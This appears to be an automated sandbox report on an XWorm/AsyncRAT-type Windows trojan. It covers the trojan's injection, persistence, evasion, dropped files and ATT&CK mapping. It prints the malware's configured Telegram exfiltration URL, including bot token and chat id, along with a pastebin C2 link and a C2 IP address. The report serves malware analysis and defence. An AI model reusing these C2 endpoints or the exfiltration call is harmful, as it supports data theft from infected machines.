                              Source: C:\ProgramData\KrnlSetupSus.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (12 identical entries)
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 identical entries)
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (2 identical entries)
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical entries)
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation (2 identical entries)
                              Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140002390 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 6_2_0000000140002390
                              Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C567E50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_1C567E50
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: KrnlSetupSus.exe, 00000003.00000002.2829186248.000000001BDD4000.00000004.00000020.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2829186248.000000001BD24000.00000004.00000020.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2842606066.000000001C8E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.21.dr | Binary or memory string: MsMpEng.exe
                              Source: C:\ProgramData\KrnlSetupSus.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                              Stealing of Sensitive Information

                              Source: Yara match | File source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: RdLfpZY5A9.exe PID: 7312, type: MEMORYSTR
                              Source: Yara match | File source: Process Memory Space: KrnlSetupSus.exe PID: 7424, type: MEMORYSTR
                              Source: Yara match | File source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara match | File source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Source: Yara match | File source: sslproxydump.pcap, type: PCAP

                              Remote Access Functionality

                              Source: Yara match | File source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: RdLfpZY5A9.exe PID: 7312, type: MEMORYSTR
                              Source: Yara match | File source: Process Memory Space: KrnlSetupSus.exe PID: 7424, type: MEMORYSTR
                              Source: Yara match | File source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara match | File source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                              MITRE ATT&CK Matrix

                              Techniques are listed per tactic column; a number in parentheses is the count of report signatures mapped to that technique, and techniques without a number were not observed in this analysis.

                              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                              Execution: Windows Management Instrumentation (12); Native API (11); Command and Scripting Interpreter (12); Scheduled Task/Job (1); PowerShell (2); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                              Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                              Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (813); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); Startup Items; Scheduled Task/Job; At; Cron
                              Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (11); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (21); Install Root Certificate (1); Software Packing (32); DLL Side-Loading (1); File Deletion (1); Rootkit (4); Masquerading (111)
                              Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                              Discovery: System Time Discovery (1); File and Directory Discovery (2); System Information Discovery (34); Security Software Discovery (561); Process Discovery (2); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); System Network Configuration Discovery (1); Network Sniffing; Network Service Discovery
                              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                              Collection: Archive Collected Data (11); Credential API Hooking (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                              Command and Control: Web Service (2); Ingress Tool Transfer (1); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                              Modify Registry
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task151
                              Virtualization/Sandbox Evasion
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Access Token Manipulation
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job813
                              Process Injection
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Hidden Files and Directories
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
Behavior Graph (ID 1575208; sample RdLfpZY5A9.exe; start date 14/12/2024; architecture WINDOWS; score 100)

The graph image and its icon legend did not survive extraction. Below, the graph's own node numbers are given in parentheses, and the numbers in square brackets after a process name are the badge counts shown on that node (created registry values / created files, in the order extracted).

Start (node 2)
  Network: ip-api.com (52)
  Signatures: Suricata IDS alerts for network traffic (78); Found malware configuration (80); Malicious sample detected (through community Yara rule) (82); 30 other signatures (84)
  Started: RdLfpZY5A9.exe [4] (node 9); powershell.exe [2, 15] (node 13)

RdLfpZY5A9.exe (node 9)
  Dropped: C:\ProgramData\KrnlSetupSus.exe, PE32 (42); C:\ProgramData\Install.exe, PE32 (44); C:\Users\user\AppData\...\RdLfpZY5A9.exe.log, CSV (46)
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) (86)
  Started: KrnlSetupSus.exe [15, 6] (node 15); Install.exe [1] (node 20)

powershell.exe (node 13)
  Signatures: Writes to foreign memory regions (88); Modifies the context of a thread in another process (thread injection) (90); Found suspicious powershell code related to unpacking or dynamic code loading (92); Injects a PE file into a foreign processes (94)
  Started: dllhost.exe [1] (node 22); conhost.exe (node 24)

KrnlSetupSus.exe (node 15)
  Network: ip-api.com 208.95.112.1, ports 49706, 80, TUT-ASUS, United States (54); 115.69.183.222, ports 37593, 49716, 49718, TRUSTPOWERLTD-AS-APTrustPowerLtdNZ, New Zealand (56); 2 other IPs or domains (58)
  Dropped: C:\ProgramData\ntoskrnl.exe, PE32 (40)
  Signatures: Antivirus detection for dropped file (60); Multi AV Scanner detection for dropped file (62); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) (64); 5 other signatures (74)
  Started: powershell.exe [21] (node 26)

Install.exe (node 20)
  Signatures: Machine Learning detection for dropped file (66)

dllhost.exe (node 22)
  Signatures: Injects code into the Windows Explorer (explorer.exe) (68); Contains functionality to inject code into remote processes (70); Writes to foreign memory regions (72); 2 other signatures (76)
  Injected: lsass.exe (node 29); svchost.exe (node 31); svchost.exe (node 33); 30 other processes (node 36)

powershell.exe (node 26)
  Signatures: Loading BitLocker PowerShell Module (96)
  Started: conhost.exe (node 38)

lsass.exe (node 29, injected)
  Signatures: Installs new ROOT certificates (98); Creates files in the system32 config directory (100); Writes to foreign memory regions (102)

svchost.exe (node 31, injected)
  Signatures: System process connects to network (likely due to code injection or exploit) (104)

svchost.exe (node 33, injected)
  Network: pastebin.com (48), with signature Connects to a pastebin service (likely for C&C) (106); api.telegram.org (50), with signature Uses the Telegram API (likely for C&C communication) (108)

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
RdLfpZY5A9.exe | 66% | ReversingLabs | Win32.Exploit.Xworm
RdLfpZY5A9.exe | 100% | Avira | TR/Dropper.Gen
RdLfpZY5A9.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\ProgramData\ntoskrnl.exe | 100% | Avira | TR/Spy.Gen
C:\ProgramData\KrnlSetupSus.exe | 100% | Avira | TR/Spy.Gen
C:\ProgramData\Install.exe | 100% | Avira | TR/Dropper.MSIL.Gen
C:\ProgramData\ntoskrnl.exe | 100% | Joe Sandbox ML |
C:\ProgramData\KrnlSetupSus.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Install.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Install.exe | 70% | ReversingLabs | ByteCode-MSIL.Infostealer.Tinba
C:\ProgramData\KrnlSetupSus.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\ProgramData\ntoskrnl.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://excel.office.comcomverUX | 0% | Avira URL Cloud | safe
https://excel.office.comcom | 0% | Avira URL Cloud | safe
http://crl3.dX | 0% | Avira URL Cloud | safe
http://cacerts.digicer | 0% | Avira URL Cloud | safe
http://crl.mU | 0% | Avira URL Cloud | safe
https://powerpoint.office.comSRD13 | 0% | Avira URL Cloud | safe
https://excel.office.comcomD | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
pastebin.com | 104.20.4.235 | true | false | | high
URLs (from malware configuration)
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1A2A8BD1A549B29BFB2C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20KMXL7DUF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20ezzznikka | false | | high
https://pastebin.com/raw/Zx6DUkf9 | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
URLs (from memory and dropped files)
Name | Source | Malicious | Antivirus Detection | Reputation
http://cacerts.digicer | lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1499817567.000001A84BBE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1499817567.000001A84BA3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.telegram.org | KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | RdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, KrnlSetupSus.exe, 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl.exe.3.dr, KrnlSetupSus.exe.0.dr | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://excel.office.comcomverUX | svchost.exe, 00000026.00000002.2851123879.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mU | powershell.exe, 00000008.00000002.1661530005.000001FE7C9C1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000004.00000002.1460763535.000001A83CB18000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/pwaimages | svchost.exe, 00000026.00000003.1868296432.000001E73150D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1868219050.000001E73150B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1879111396.000001E73150F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1867927983.000001E731506000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1867055083.000001E731284000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1631048778.000001E731284000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://excel.office.com | svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.micro | svchost.exe, 00000014.00000000.1529745173.000001486A5B0000.00000002.00000001.00040000.00000000.sdmp | false | | high
https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=59991 | KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | powershell.exe, 00000008.00000002.1661530005.000001FE7C9C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://excel.office.comSRD1% | svchost.exe, 00000026.00000002.2806525834.000001E730F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865572552.000001E7315D7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1634316076.000001E731510000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1627188967.000001E730F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1499817567.000001A84BA3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://powerpoint.office.comSRD13 | svchost.exe, 00000026.00000002.2847177850.000001E731665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1634316076.000001E731510000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://outlook.comSRD1- | svchost.exe, 00000026.00000000.1627319960.000001E730F3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2813637580.000001E730F43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1880000522.000001E730F41000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://excel.office.comcom | svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://word.office.comSRD1# | svchost.exe, 00000026.00000003.1881507986.000001E7315C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://Passport.NET/tb | Microsoft-Windows-LiveId%4Operational.evtx.21.dr | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1460763535.000001A83B9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1574489428.000001FE64291000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl3.dX | lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1460763535.000001A83B9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1574489428.000001FE64291000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pastebin.com | KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://excel.office.comcomD | svchost.exe, 00000026.00000003.1890329925.000001E7311D6000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
115.69.183.222 | unknown | New Zealand | 55850 | TRUSTPOWERLTD-AS-APTrustPowerLtdNZ | false
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575208
Start date and time: 2024-12-14 18:52:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 33
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RdLfpZY5A9.exe
(renamed because the original name is a hash value)
Original Sample Name: b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@16/81@3/4
EGA Information:
• Successful, ratio: 85.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 106
• Number of non-executed functions: 215
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 20.190.147.2, 20.189.173.21
